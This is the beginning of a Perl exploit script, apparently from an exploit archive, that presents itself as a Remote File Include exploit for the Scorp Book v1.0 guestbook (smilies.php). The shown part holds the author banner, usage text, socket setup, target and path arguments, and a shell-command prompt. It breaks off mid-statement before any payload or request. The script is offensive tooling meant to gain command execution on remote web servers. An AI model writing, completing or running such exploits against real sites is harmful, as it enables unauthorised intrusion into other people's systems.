|
# [~] Portal : Scorp Book v1.0
# [~] Download : http://www.ectona.org/download/?id=598&s=info
# [~] Author : KaRTaLl | k4rtal@gmail.com
# [~] Class : Remote File Include Exploit
use IO::Socket;
if (@ARGV < 2){
print "
+**********************************************************************+
* *
* # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit *
* *
* # Usage : xpl.pl [Target] [Path] *
* *
* # Example : xpl.pl *
* *
* Vuln & Coded By KaRTaL *
+**********************************************************************+
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
print "\n[~] Please wait ...\n";
print "[~] Shell : ";$cmd =